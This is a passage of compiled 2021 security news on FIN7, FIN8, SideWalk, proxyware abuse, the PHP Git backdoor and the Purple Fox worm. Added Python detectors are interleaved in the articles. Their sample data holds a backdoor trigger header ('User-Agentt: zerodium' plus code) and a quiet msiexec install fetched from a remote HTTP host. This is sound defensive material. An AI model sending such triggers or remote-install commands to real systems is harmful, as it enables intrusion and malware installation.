An Eastern European group active since at least mid-2015, FIN7 has a checkered history of targeting restaurant, gambling, and hospitality industries in the U.S. to plunder financial information such as credit and debit card numbers that were then used or sold for profit on underground marketplaces.

Although multiple members of the collective have been imprisoned for their roles in different campaigns since the start of the year, FIN7's activities have also been tied to another group called Carbanak, given its similar TTPs, with the main distinction being that while FIN7 focuses on hospitality and retail sectors, Carbanak has singled out banking institutions.

In the latest attack observed by Anomali, the infection commences with a Microsoft Word maldoc containing a decoy image that's purported to have been "made on Windows 11 Alpha," urging the recipient to enable macros to trigger the next stage of activity, which involves executing a heavily-obfuscated VBA macro to retrieve a JavaScript payload, which has been found to share similar functionality with other backdoors used by FIN7.

Besides taking several steps to try to impede analysis by populating the code with junk data, the VB script also checks if it is running under a virtualized environment such as VirtualBox and VMWare, and if so, terminates itself, in addition to stopping the infection chain upon detecting Russian, Ukrainian, or several other Eastern European languages.

The backdoor's attribution to FIN7 stems from overlaps in the victimology and techniques adopted by the threat actor, including the use of a JavaScript-based payload to plunder valuable information.

"FIN7 is one of the most notorious financially motivated groups due to the large amounts of sensitive data they have stolen through numerous techniques and attack surfaces," the researchers said. "Things have been turbulent for the threat group over the past few years as with success and notoriety comes the ever-watchful eye of the authorities. Despite high-profile arrests and sentencing, including alleged higher-ranking members, the group continues to be as active as ever."


Cybercriminals Abusing Internet-Sharing Services to Monetize Malware Campaigns
3.9.21 
Virus  Thehackernews

Threat actors are capitalizing on the growing popularity of proxyware platforms like Honeygain and Nanowire to monetize their own malware campaigns, once again illustrating how attackers are quick to repurpose and weaponize legitimate platforms to their advantage.

"Malware is currently leveraging these platforms to monetize the internet bandwidth of victims, similar to how malicious cryptocurrency mining attempts to monetize the CPU cycles of infected systems," researchers from Cisco Talos said in a Tuesday analysis. "In many cases, these applications are featured in multi-stage, multi-payload malware attacks that provide adversaries with multiple monetization methods."

Proxyware applications, also called internet-sharing applications, are legitimate services that allow users to carve out a percentage of their internet bandwidth for other devices, often for a fee, through a client application offered by the provider, enabling other customers to access the internet using the internet connections offered by nodes on the network. For consumers, such services are "advertised as a means to circumvent geolocation checks on streaming or gaming platforms while generating some income for the user offering up their bandwidth," the researchers explained.

But the illicit use of proxyware also introduces a multitude of risks in that they could permit threat actors to obfuscate the source of their attacks, thereby not only giving them the ability to perform malicious actions by making it appear as if they are originating from legitimate residential or corporate networks, but also render ineffective conventional network defenses that rely on IP-based blocklists.

"The same mechanisms currently used to monitor and track Tor exit nodes, 'anonymous' proxies, and other common traffic obfuscation techniques do not currently exist for tracking nodes within these proxyware networks," the researchers noted.

That's not all. Researchers identified several techniques adopted by bad actors, including trojanized proxyware installers that allow for stealthy distribution of information stealers and remote access trojans (RATs) without the victims' knowledge. In one instance observed by Cisco Talos, attackers were found using the proxyware applications to monetize victims' network bandwidth to generate revenue as well as exploit the compromised machine's CPU resources for mining cryptocurrency.

Another case involved a multi-stage malware campaign that culminated in the deployment of an info-stealer, a cryptocurrency mining payload, as well as proxyware software, underscoring the "varied approaches available to adversaries," who can now go beyond cryptojacking to also plunder valuable data and monetize successful infections in other ways.

Even more concerningly, researchers detected malware that was used to silently install Honeygain on infected systems, and register the client with the adversary's Honeygain account to profit off the victim's internet bandwidth. This also means that an attacker can sign up for multiple Honeygain accounts to scale their operation based on the number of infected systems under their control.

"For organizations, these platforms pose two essential problems: The abuse of their resources, eventually being blocklisted due to activities they don't even control and it increases organizations' attack surface, potentially creating an initial attack vector directly on the endpoint," the researchers concluded. "Due to the various risks associated with these platforms, it is recommended that organizations consider prohibiting the use of these applications on corporate assets."


Researchers Uncover FIN8's New Backdoor Targeting Financial Institutions
25.8.21 
Virus  Thehackernews
A financially motivated threat actor notorious for setting its sights on retail, hospitality, and entertainment industries has been observed deploying a completely new backdoor on infected systems, indicating the operators are continuously retooling their malware arsenal to avoid detection and stay under the radar.

The previously undocumented malware has been dubbed "Sardonic" by Romanian cybersecurity technology company Bitdefender, which it encountered during a forensic investigation in the wake of an unsuccessful attack carried out by FIN8 aimed at an unnamed financial institution located in the U.S.

Said to be under active development, "Sardonic backdoor is extremely potent and has a wide range of capabilities that help the threat actor leverage new malware on the fly without updating components," Bitdefender researchers Eduard Budaca and Victor Vrabie said in a report shared with The Hacker News.

Since emerging on the scene in January 2016, FIN8 has leveraged a multitude of techniques such as spear-phishing and malicious software such as PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.

The threat group, which is known for taking extended breaks in between campaigns to fine-tune its tactics and increase the success rate of its operations, conducts cyber incursions primarily through "living off the land" attacks, using built-in tools and interfaces like PowerShell as well as taking advantage of legitimate services like sslip.io to disguise their activity.

Earlier this March, Bitdefender revealed FIN8's return after a year-and-a-half hiatus to target insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy with a revamped version of the BADHATCH implant featuring upgraded capabilities, including screen capturing, proxy tunneling, credential theft, and fileless execution.

In the latest incident analyzed by the firm, the attackers are said to have infiltrated the target network to conduct detailed reconnaissance, before carrying out lateral movement and privilege escalation activities to deploy the malware payload. "There were multiple attempts to deploy the Sardonic backdoor on domain controllers in order to continue with privilege escalation and lateral movement, but the malicious command lines were blocked," the researchers said.

Written in C++, Sardonic not only takes steps to establish persistence on the compromised machine, but also comes equipped with capabilities that allow it to obtain system information, execute arbitrary commands, and load and execute additional plugins, the results of which are transmitted to a remote attacker-controlled server.

If anything, the latest development is yet another sign of FIN8's shift in tactics by strengthening its capabilities and malware delivery infrastructure. To mitigate the risk associated with financial malware, companies are recommended to separate their POS networks from those used by employees or guests, train employees to better spot phishing emails, and improve email security solutions to filter potentially suspicious attachments.


New SideWalk Backdoor Targets U.S.-based Computer Retail Business
25.8.21 
Virus  Thehackernews
A computer retail company based in the U.S. was the target of a previously undiscovered implant called SideWalk as part of a recent campaign undertaken by a Chinese advanced persistent threat group primarily known for singling out entities in East and Southeast Asia.

Slovak cybersecurity firm ESET attributed the malware to an advanced persistent threat it tracks under the moniker SparklingGoblin, an adversary believed to be connected to the Winnti umbrella group, noting its similarities to another backdoor dubbed Crosswalk that was put to use by the same threat actor in 2019.

"SideWalk is a modular backdoor that can dynamically load additional modules sent from its C&C [command-and-control] server, makes use of Google Docs as a dead drop resolver, and Cloudflare workers as a C&C server," ESET researchers Thibaut Passilly and Mathieu Tartare said in a report published Tuesday. "It can also properly handle communication behind a proxy."

Since first emerging on the threat landscape in 2019, SparklingGoblin has been linked to several attacks aimed at Hong Kong universities using backdoors such as Spyder and ShadowPad, the latter of which has become a preferred malware of choice among multiple Chinese threat clusters in recent years.

Over the past year, the collective has hit a broad range of organizations and verticals around the world, with a particular focus on the academic institutions located in Bahrain, Canada, Georgia, India, Macao, Singapore, South Korea, Taiwan, and the U.S. Other targeted entities include media companies, religious organizations, e-commerce platforms, computer and electronics manufacturers, and local governments.

SideWalk is characterized as an encrypted shellcode, which is deployed via a .NET loader that takes care of "reading the encrypted shellcode from disk, decrypting it and injecting it into a legitimate process using the process hollowing technique." The next phase of the infection commences with SideWalk establishing communications with the C&C server, with the malware retrieving the encrypted IP address from a Google Docs document.

"The decrypted IP address is 80.85.155[.]80. That C&C server uses a self-signed certificate for the facebookint[.]com domain. This domain has been attributed to BARIUM by Microsoft, which partially overlaps with what we define as Winnti Group. As this IP address is not the first one to be used by the malware, it is considered to be the fallback one," the researchers said.

Besides using HTTPS protocol for C&C communications, SideWalk is designed to load arbitrary plugins sent from the server, amass information about running processes, and exfiltrate the results back to the remote server.

"SideWalk is a previously undocumented backdoor used by the SparklingGoblin APT group. It was most likely produced by the same developers as those behind CROSSWALK, with which it shares many design structures and implementation details," the researchers concluded.


PHP Infiltrated with Backdoor Malware
30.3.2021 
Virus  Securityaffairs

The server for the web-application scripting language was compromised on Sunday.

The PHP project on Sunday announced that attackers were able to gain access to its main Git server, uploading two malicious commits, including a backdoor. They were discovered before they went into production.

PHP is a widely used open-source scripting language often used for web development. It can be embedded into HTML. The commits were pushed to the php-src repository, thus offering attackers a supply-chain opportunity to infect websites that pick up the malicious code believing it to be legit.

Both commits claimed to “fix a typo” in the source code. They were uploaded using the names of PHP’s maintainers, Rasmus Lerdorf and Nikita Popov, according to a message sent by Popov to the project’s mailing list on Sunday. He added that he didn’t think it was a simple case of credential theft.

“We don’t yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account),” he explained.

In response to the hack, PHP is moving its servers to GitHub, making them canonical.

“While investigation is still underway, we have decided that maintaining our own git infrastructure is an unnecessary security risk, and that we will discontinue the git.php.net server,” Popov explained. “Instead, the repositories on GitHub, which were previously only mirrors, will become canonical. This means that changes should be pushed directly to GitHub rather than to git.php.net…This change also means that it is now possible to merge pull requests directly from the GitHub web interface.”

He also noted that PHP is reviewing all of its repositories for any corruption beyond the two commits that were found.

“We are lucky that the malicious commits were detected before reaching production systems,” said Craig Young, principal security researcher at Tripwire, via email. “Had it not been detected, the code could have ultimately poisoned the binary package repositories which countless organizations rely upon and trust. Open-source projects which are self-hosting their code repositories may be at increased risk of this type of supply-chain attack and must have robust processes in place to detect and reject suspicious commits.”

Weaponizing the Software Supply Chain
Making use of open-source repositories as a vehicle to compromise websites and applications is not uncommon.

In March, for instance, researchers spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository — all of which exfiltrated sensitive information. The packages weaponized a proof-of-concept (PoC) code dependency-confusion exploit that was recently devised by security researcher Alex Birsan to inject rogue code into developer projects.

In January meanwhile, three malicious software packages were published to npm, masquerading as legitimate by using brandjacking. Any applications corrupted by the code could steal tokens and other information from Discord users, researchers said.

And in December, RubyGems, an open-source package repository and manager for the Ruby web programming language, took two of its software packages offline after they were found to be laced with malware.
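The incident above hinges on two commits that carried maintainers' names but were pushed through a compromised server; git author fields are free-form text, so only a good signature says anything about who really pushed. The following is an added example, not PHP project tooling: it screens the output of `git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s'` (where `%G?` is git's signature status: G good, B bad, U good but untrusted key, N no signature, E cannot be checked) and holds back maintainer-attributed commits lacking a good signature. The log, the maintainer addresses and the all-digit hashes are constructed placeholders.

```python
"""Screen a git history for commits that name a trusted maintainer as author but
carry no good signature, the shape of the two "Fix typo" commits described above.
Added example, not PHP project code. Input is `git log` output produced with the
format string from the lead-in; the sample at the bottom is constructed."""
import re

US = "\x1f"  # unit separator requested via %x1f, robust against spaces in subjects
TRUSTED = {"rasmus@maintainer.example", "nikic@maintainer.example"}  # assumed addresses
LOW_EFFORT_RE = re.compile(r"^\s*fix(?:ed|es)?\s+typo", re.I)  # the incident's cover story


def parse_log(text):
    """Split one log line per commit into dicts; fields are separated by US."""
    commits = []
    for line in text.strip().splitlines():
        sha, name, email, status, subject = line.split(US, 4)
        commits.append({"sha": sha, "name": name, "email": email,
                        "status": status, "subject": subject})
    return commits


def screen(commits):
    """Return (short sha, reason) for commits a merge gate should hold back.

    A bad signature is rejected regardless of author. A commit claiming a
    trusted maintainer must carry a good (G) signature; anything else (no
    signature, untrusted key, unverifiable) is treated as unproven identity.
    """
    findings = []
    for c in commits:
        reasons = []
        if c["status"] == "B":
            reasons.append("bad signature")
        elif c["email"] in TRUSTED and c["status"] != "G":
            reasons.append(f"maintainer commit without good signature ({c['status']})")
        # A throwaway subject is not evidence on its own, only a note on a
        # commit that is already suspicious for signature reasons.
        if reasons and LOW_EFFORT_RE.match(c["subject"]):
            reasons.append("low-effort subject on suspicious commit")
        if reasons:
            findings.append((c["sha"][:12], "; ".join(reasons)))
    return findings


# Constructed sample: placeholder hashes, assumed maintainer addresses.
SAMPLE_LOG = "\n".join(US.join(f) for f in [
    ("1" * 40, "Rasmus Lerdorf", "rasmus@maintainer.example", "N", "Fix typo"),
    ("2" * 40, "Nikita Popov", "nikic@maintainer.example", "N", "Fix typo"),
    ("3" * 40, "Nikita Popov", "nikic@maintainer.example", "G", "Fix typo in zlib docs"),
    ("4" * 40, "Some Contributor", "dev@contributor.example", "N", "Add test for foo()"),
])

if __name__ == "__main__":
    for sha, reason in screen(parse_log(SAMPLE_LOG)):
        print(sha, reason)
```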


Hackers breached the PHP ‘s Git Server and inserted a backdoor in the source code
30.3.2021 
Virus  Securityaffairs

Threat actors hacked the official Git server of the PHP programming language and pushed unauthorized updates to insert a backdoor into the source code.
Unknown attackers hacked the official Git server of the PHP programming language and pushed unauthorized updates to insert a backdoor into the source code.

On March 28, the attackers pushed two commits to the “php-src” repository hosted on the git.php.net server, using the accounts of Rasmus Lerdorf, the author of PHP, and JetBrains developer Nikita Popov.

Maintainers of the project are investigating the supply chain attack; experts believe the attackers compromised the git.php.net server itself.

“We don’t yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account).” wrote Popov. “While investigation is still underway, we have decided that maintaining our own git infrastructure is an unnecessary security risk, and that we will discontinue the git.php.net server. Instead, the repositories on GitHub, which were previously only mirrors, will become canonical. This means that changes should be pushed directly to GitHub rather than to git.php.net.”

The maintainers of PHP reverted the changes and are reviewing the repositories for any other evidence of compromise beyond the two referenced commits.

In the future, in order to access the repositories, users will need to be part of the php organization on GitHub and have 2FA enabled on their account. With this new configuration it is also possible to merge pull requests directly from the GitHub web interface.

At this time, it is not immediately clear if the backdoor was downloaded and distributed by other parties before the malicious commits were detected.

The analysis of malicious code revealed the presence of a string “Zerodium,” which is the name of one of the most popular zero-day brokers.

Despite the references to Zerodium in the code of the backdoor, there is no evidence to suggest that the malware was designed to be sold as a proof-of-concept (PoC) to the 0day broker.


Backdoor Disguised as Typo Fix Added to PHP Source Code
30.3.2021 
Virus  Securityweek

The developers of the PHP scripting language revealed on Sunday that they had identified what appeared to be malicious code in the php-src repository hosted on the git.php.net server.

The unauthorized code was disguised as two typo fix-related commits apparently pushed by Rasmus Lerdorf, author of the PHP language, and Nikita Popov, an important PHP contributor. The code seems to allow an attacker to remotely execute arbitrary PHP code.

The investigation into this incident is ongoing, but the backdoor was discovered quickly and it apparently did not make it into a PHP update made available to users.

“We don't yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov explained after the incident was discovered.

“While investigation is still underway, we have decided that maintaining our own git infrastructure is an unnecessary security risk, and that we will discontinue the git.php.net server. Instead, the repositories on GitHub, which were previously only mirrors, will become canonical. This means that changes should be pushed directly to GitHub rather than to git.php.net,” he added.

Interestingly, the malicious code is triggered by the string “zerodium.” Zerodium is the name of a well-known and controversial exploit acquisition company that claims to provide exploits to “government organizations (mainly from Europe and North America) in need of advanced zero-day exploits and cybersecurity capabilities.”

The commit added to the PHP code also contains the text “REMOVETHIS: sold to zerodium, mid 2017.”

Backdoor added to PHP source code

It’s unclear if and how Zerodium is linked to this incident, but SecurityWeek has reached out to the company for comment and will update this article if it responds.


PHP's Git Server Hacked to Insert Secret Backdoor to Its Source code
30.3.2021 
Virus  Thehackernews

In yet another instance of a software supply chain attack, unidentified actors hacked the official Git server of the PHP programming language and pushed unauthorized updates to insert a secret backdoor into its source code.

The two malicious commits were pushed to the self-hosted "php-src" repository hosted on the git.php.net server, illicitly using the names of Rasmus Lerdorf, the author of the programming language, and Nikita Popov, a software developer at Jetbrains.

The changes are said to have been made yesterday on March 28.

"We don't yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account)," Popov said in an announcement.

The changes, which were committed as "Fix Typo" in an attempt to slip through undetected as a typographical correction, involved provisions for execution of arbitrary PHP code. "This line executes PHP code from within the useragent HTTP header ("HTTP_USER_AGENTT"), if the string starts with 'zerodium'," PHP developer Jake Birchall said.

Besides reverting the changes, the maintainers of PHP are said to be reviewing the repositories for any corruption beyond the aforementioned two commits. It's not immediately clear if the tampered codebase was downloaded and distributed by other parties before the changes were spotted and reversed.

Zerodium is a zero-day exploit broker known for acquiring high-impact and high-risk vulnerabilities found in some of the most used software products on the market today. Despite references in the backdoor code, there is no evidence to suggest if this was an attempt on the part of the hackers to sell a proof-of-concept (PoC) to the company.

In the wake of the breach, the team behind PHP is making a number of changes, including migrating the source code repository to GitHub, with changes to be pushed directly to GitHub rather than to git.php.net going forward. Additionally, contributing to the PHP project will now require developers to be added as a part of the organization on GitHub.

The development comes almost two months after researchers demonstrated a novel supply chain attack called "dependency confusion" that's designed to execute unauthorized code inside a target's internal software build system.

We have reached out to the maintainers of PHP regarding the incident and we will update the story if we hear back.
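The trigger described above (a lookalike "User-Agentt" header whose value starts with "zerodium", the remainder being run as PHP) is the shape a hidden switch typically takes: a header name one edit away from a standard one, carrying a magic prefix. The following is an added example, not php-src code: it parses a raw HTTP request head and flags both properties, so a proxy or log check can surface probes for this backdoor. The two requests are constructed.

```python
"""Inspect a raw HTTP/1.1 request for the backdoor trigger pattern described above.
Added example, not PHP project code. Flags (a) header names one edit away from a
standard header name and (b) header values starting with the trigger word.
The sample requests at the bottom are constructed."""
from dataclasses import dataclass

STANDARD_HEADERS = {
    "host", "user-agent", "accept", "accept-language", "accept-encoding",
    "content-type", "content-length", "connection", "cookie", "referer",
    "authorization", "x-forwarded-for", "cache-control", "origin",
}
TRIGGER = "zerodium"  # prefix quoted in the article


@dataclass(frozen=True)
class Finding:
    header: str
    reason: str   # "lookalike-header" or "trigger-prefix"
    detail: str   # standard name imitated, or the offending value


def parse_request(raw):
    """Return (request line, [(name, value), ...]) from a raw request head."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def one_edit_away(a, b):
    """True when a and b differ by exactly one insertion, deletion or substitution."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        return sum(x != y for x, y in zip(a, b)) == 1
    short, long_ = (a, b) if len(a) < len(b) else (b, a)
    i = j = 0
    skipped = False
    while i < len(short) and j < len(long_):
        if short[i] == long_[j]:
            i += 1
            j += 1
        elif skipped:
            return False
        else:
            skipped = True  # the one extra character in the longer string
            j += 1
    return True


def lookalike_of(name):
    """Standard header name that `name` imitates, or None (exact matches are fine)."""
    n = name.lower()
    if n in STANDARD_HEADERS:
        return None
    for std in STANDARD_HEADERS:
        if one_edit_away(n, std):
            return std
    return None


def inspect_request(raw):
    """List findings for a raw request; an empty list means nothing suspicious."""
    _, headers = parse_request(raw)
    findings = []
    for name, value in headers:
        std = lookalike_of(name)
        if std:
            findings.append(Finding(name, "lookalike-header", std))
        if value.lower().startswith(TRIGGER):
            findings.append(Finding(name, "trigger-prefix", value))
    return findings


# Constructed samples; the payload after the trigger is a harmless placeholder.
SUSPICIOUS = ("GET /index.php HTTP/1.1\r\nHost: www.example.test\r\n"
              "User-Agent: Mozilla/5.0\r\n"
              "User-Agentt: zerodium echo 'constructed';\r\n\r\n")
BENIGN = ("GET / HTTP/1.1\r\nHost: www.example.test\r\n"
          "User-Agent: curl/7.79\r\nAccept: */*\r\n\r\n")

if __name__ == "__main__":
    for f in inspect_request(SUSPICIOUS):
        print(f)
```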


New Purple Fox version includes Rootkit and implements wormable propagation
29.3.2021 
Virus  Securityaffairs

Researchers from Guardicore have spotted a new variant of the Purple Fox Windows malware that implements worm-like propagation capabilities.
Researchers from Guardicore have discovered a new version of the Purple Fox Windows malware that implements worm-like propagation capabilities. Up until recently, Purple Fox’s operators infected machines by using exploit kits and phishing emails.

Previous versions of the malware were infecting machines by using exploit kits and phishing emails, while the new samples were targeting Windows machines exposed online through SMB password brute force.
“Purple Fox was discovered in March of 2018 and was covered as an exploit kit targeting Internet Explorer and Windows machines with various privilege escalation exploits.” reads the report published by Guardicore. “However, throughout the end of 2020 and the beginning of 2021, Guardicore Global Sensors Network (GGSN) detected Purple Fox’s novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes.”

Since May 2020, experts have observed a rise of roughly 600%, amounting to a total of 90,000 attacks over the rest of 2020 and the beginning of 2021.

The Purple Fox malware was first discovered in March 2018. It is distributed in the form of malicious “.msi” packages, which the experts found on nearly 2,000 compromised Windows servers. The installer extracts the payloads from within the MSI package and decrypts them.
According to Guardicore, the post exploitation functionality of Purple Fox hasn’t changed much.

Once it has infected a system, the malware blocks multiple ports (445, 139, and 135) to prevent the infected machine from being reinfected or targeted by other attackers.

The malware attempts to spread by generating IP ranges and scanning them on port 445; it then tries to authenticate to SMB by brute-forcing credentials or by establishing a null session.
Once authenticated, the malicious code creates a service whose name matches the regex AC0[0-9]{1} (e.g. AC01, AC02, AC05) and that downloads the MSI installation package from one of the many HTTP servers.

Experts reported that the MSI package contains three files: a 64-bit DLL payload (winupdate64), a 32-bit DLL payload (winupdate32), and an encrypted file containing a rootkit.
Researchers from security firm 360 Security published a detailed analysis of the relationship between Purple Fox and the rootkit.

“Once the rootkit is loaded, the installer will reboot the machine in order to rename the malware DLL into a system DLL file that will be executed on boot.” concludes the analysis. “Once the machine is restarted, the malware will be executed as well. After its execution, the malware will start its propagation process.”

Experts from Guardicore published the indicators of compromise (IoCs) associated with the latest malware campaign.


Purple Fox Malware Targets Windows Machines With New Worm Capabilities
25.3.2021
Virus  Threatpost

A new infection vector from the established malware puts internet-facing Windows systems at risk from SMB password brute-forcing.

A malware that has historically targeted exposed Windows machines through phishing and exploit kits has been retooled to add new “worm” capabilities.

Purple Fox, which first appeared in 2018, is an active malware campaign that until recently required user interaction or some kind of third-party tool to infect Windows machines. However, the attackers behind the campaign have now upped their game and added new functionality that can brute force its way into victims’ systems on its own, according to new Tuesday research from Guardicore Labs.

“Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force,” Guardicore Labs’ Amit Serper said.

In addition to these new worm capabilities, Purple Fox malware now also includes a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove, he said.

Latest Attack Vector
Researchers analyzed Purple Fox’s latest activity and found two significant changes to how attackers are propagating malware on Windows machines. The first is that the new worm payload executes after a victim machine is compromised through a vulnerable exposed service (such as SMB).

Purple Fox also is using a previous tactic to infect machines with malware through a phishing campaign, sending the payload via email to exploit a browser vulnerability, researchers observed.

Once the worm infects a victim’s machine, it creates a new service to establish persistence and execute a simple command that can iterate through a number of URLs that include the MSI for installing Purple Fox on a compromised machine, said Serper.

“msiexec will be executed with the /i flag, in order to download and install the malicious MSI package from one of the hosts in the statement,” he explained. “It will also be executed with the /Q flag for ‘quiet’ execution, meaning, no user interaction will be required.”

Once the package is executed, the MSI installer will launch by impersonating a Windows Update package along with Chinese text, which roughly translates to “Windows Update” and random letters, he said. These letters are randomly generated between each different MSI installer to create a different hash and make it difficult to create links between different versions of the same MSI.

“This is a ‘cheap’ and simple way of evading various detection methods, such as static signatures,” Serper wrote.

As the installation progresses, the installer will extract the payloads and decrypt them from within the MSI package, activity that includes modifying the Windows firewall in such a way as to prevent the infected machine from being reinfected, and/or to be exploited by a different threat actor, researchers observed.

The extracted files are then executed and a rootkit—which “ironically” was developed by a security researcher to keep malware research tasks hidden from the malware itself — is installed that hides various registry keys and values, files, etc., according to Serper.

The installer then reboots the machine to both rename the malware dynamic link library (DLL) into a system DLL file that will be executed on boot as well as to execute the malware, which immediately begins its propagation process. This entails generating IP ranges and beginning to scan them on port 445 to start the brute-forcing process, researchers said.

If the authentication is successful, the malware will create a service that will download the MSI installation package from one of the many HTTP servers in use, completing the infection loop, according to researchers.
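The infection loop just described, and the Guardicore details summarised in the earlier Securityaffairs item (service names matching AC0[0-9], msiexec run with /i and /Q against an HTTP host, firewall changes closing 445/139/135, port-445 sweeps), map onto a handful of host-log checks. The following is an added example, not Guardicore's code: it runs those checks over constructed key=value records loosely modelled on Windows service-install, process-creation and network-connection events. The use of netsh to add the blocking firewall rule and the sweep threshold are assumptions, not details from the article.

```python
"""Detection heuristics for the Purple Fox worm chain described above.
Added example, not Guardicore's code. The log records are constructed
key=value lines; event names, the netsh command and the sweep threshold
are assumptions for the sake of the example."""
import re
from collections import defaultdict

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERVICE_NAME_RE = re.compile(r"^AC0[0-9]$")  # regex quoted from Guardicore's analysis
SMB_PORTS = {"445", "139", "135"}            # ports the malware closes after infection
SWEEP_THRESHOLD = 20                          # distinct targets on 445 from one host (assumed)


def parse_record(line):
    """Turn 'Key=value Key="quoted value"' into a dict (quoted values keep spaces)."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def check_service(rec):
    """Service installed with the AC0x naming pattern."""
    if rec.get("Event") == "ServiceInstalled" and SERVICE_NAME_RE.match(rec.get("ServiceName", "")):
        return "purple-fox-service-name"
    return None


def check_msiexec(rec):
    """msiexec asked to install (/i) quietly (/q*) straight from an HTTP(S) host."""
    cmd = rec.get("CommandLine", "")
    if rec.get("Event") != "ProcessCreate" or "msiexec" not in cmd.lower():
        return None
    args = cmd.split()
    flags = {a.lower() for a in args if a.startswith("/")}
    remote = any(a.lower().startswith(("http://", "https://")) for a in args)
    if "/i" in flags and any(f.startswith("/q") for f in flags) and remote:
        return "msiexec-quiet-remote-install"
    return None


def check_firewall(rec):
    """Inbound block rule on an SMB/RPC port (assumed to be added via netsh)."""
    cmd = rec.get("CommandLine", "").lower()
    if rec.get("Event") != "ProcessCreate" or "netsh" not in cmd or "action=block" not in cmd:
        return None
    m = re.search(r"localport=(\d+)", cmd)
    if m and m.group(1) in SMB_PORTS:
        return "smb-port-blocked"
    return None


def analyze(lines):
    """Return (host, tag) findings; the sweep check is stateful across lines."""
    findings = []
    sweep = defaultdict(set)
    for line in lines:
        rec = parse_record(line)
        for check in (check_service, check_msiexec, check_firewall):
            tag = check(rec)
            if tag:
                findings.append((rec.get("Host"), tag))
        if rec.get("Event") == "NetConnect" and rec.get("DstPort") == "445":
            sweep[rec.get("Host")].add(rec.get("DstIp"))
    for host, targets in sorted(sweep.items()):
        if len(targets) >= SWEEP_THRESHOLD:
            findings.append((host, "port-445-sweep"))
    return findings


# Constructed sample: ws-02 is benign activity, ws-07 shows the full chain.
SAMPLE_LOG = [
    'Host=ws-02 Event=ServiceInstalled ServiceName=Spooler',
    'Host=ws-02 Event=ProcessCreate CommandLine="msiexec.exe /i C:/Setup/tool.msi /qn"',
    'Host=ws-07 Event=ServiceInstalled ServiceName=AC03',
    'Host=ws-07 Event=ProcessCreate CommandLine="msiexec.exe /i http://203.0.113.45/update.msi /Q"',
    'Host=ws-07 Event=ProcessCreate CommandLine="netsh advfirewall firewall add rule'
    ' name=blk dir=in action=block protocol=TCP localport=445"',
] + [f"Host=ws-07 Event=NetConnect DstIp=10.0.1.{i} DstPort=445" for i in range(1, 26)]

if __name__ == "__main__":
    for host, tag in analyze(SAMPLE_LOG):
        print(host, tag)
```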

Previous Purple Fox Activity
Researchers identified nearly 3,000 servers previously compromised by the actors behind Purple Fox, which they have repurposed to host their droppers and malicious payloads, said Serper.

Purple Fox malware incidents. Credit: Guardicore Labs

“We have established that the vast majority of the servers, which are serving the initial payload, are running on relatively old versions of Windows Server running IIS version 7.5 and Microsoft FTP, which are known to have multiple vulnerabilities with varying severity levels,” he wrote.

Purple Fox was last seen engaging in significant malicious activity last spring and summer, with activity falling slightly off toward the end of the year and then ramping up again in early 2021, researchers said. Since May 2020, infections rose by about 600 percent for a total of 90,000 attacks at the time of the post, according to researchers.

Last July, for instance, the Purple Fox exploit kit (EK) added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks. At the time researchers said they were expecting attackers to add new functionality in the future as well.

Purple Fox is only the latest malware to be retooled with “worm” capabilities – other malware families like the Rocke Group and the Ryuk ransomware have also added self-propagation functionalities.


Honeywell Says Malware Disrupted IT Systems
25.3.2021
Virus  Securityweek

Industrial giant Honeywell on Tuesday revealed that some of its IT systems were disrupted as a result of a malware attack.

The company said the intrusion was detected “recently” and only a “limited number” of IT systems were disrupted. No other information has been provided regarding impact.

An investigation into the incident is ongoing, but Honeywell says it has found no evidence to date that the attacker managed to exfiltrate data from systems that store customer information. However, based on its statement, it cannot completely rule out that some customer data may have been compromised.

“At this time, we do not expect this incident will have a material impact on Honeywell,” the company stated. “We promptly took steps to address the incident, including partnering with Microsoft to assess and remediate the situation. Our systems have since been secured, we identified the point of entry, and all unauthorized access has been revoked.”

Law enforcement has been notified and impacted services should be working properly by now.

SecurityWeek has reached out to Honeywell to find out if the incident involved a piece of ransomware.

The news from Honeywell comes shortly after Canada-based IoT company Sierra Wireless revealed that some of its internal IT systems were recently hit by ransomware. Sierra, which also provides solutions for — among others — industrial organizations, said the incident disrupted production at manufacturing facilities.

Other major companies that recently reported disruption to production operations due to a cyberattack include beverage conglomerate Molson Coors and packaging giant WestRock.


Purple Fox Malware Squirms Like a Worm on Windows
24.3.2021
Virus  Securityweek

Malware hunters at Guardicore are warning that an aggressive botnet operator has turned to SMB password brute-forcing to infect and spread like a worm across the Microsoft Windows ecosystem.

The malware campaign, dubbed Purple Fox, has been active since at least 2018 and the discovery of the new worm-like infection vector is yet another sign that consumer-grade malware continues to reap profits for cybercriminals.

According to Guardicore researcher Amit Serper, the Purple Fox operators primarily used exploit kits and phishing emails to build botnets for crypto-mining and other nefarious uses.

Now, the new SMB brute-force method is being combined with rootkit capabilities to hide and spread widely across internet-facing Windows computers with weak passwords.

“Throughout the end of 2020 and the beginning of 2021, Guardicore Global Sensors Network (GGSN) detected Purple Fox’s novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes,” Serper explained.

Serper said May 2020 saw a “significant amount of malicious activity” where the number of infections climbed by roughly 600% and amounted to a total of 90,000 attacks.

Serper’s blog, which contains IOCs to help defenders hunt for signs of infection, explains the aggressiveness of the malware operator:

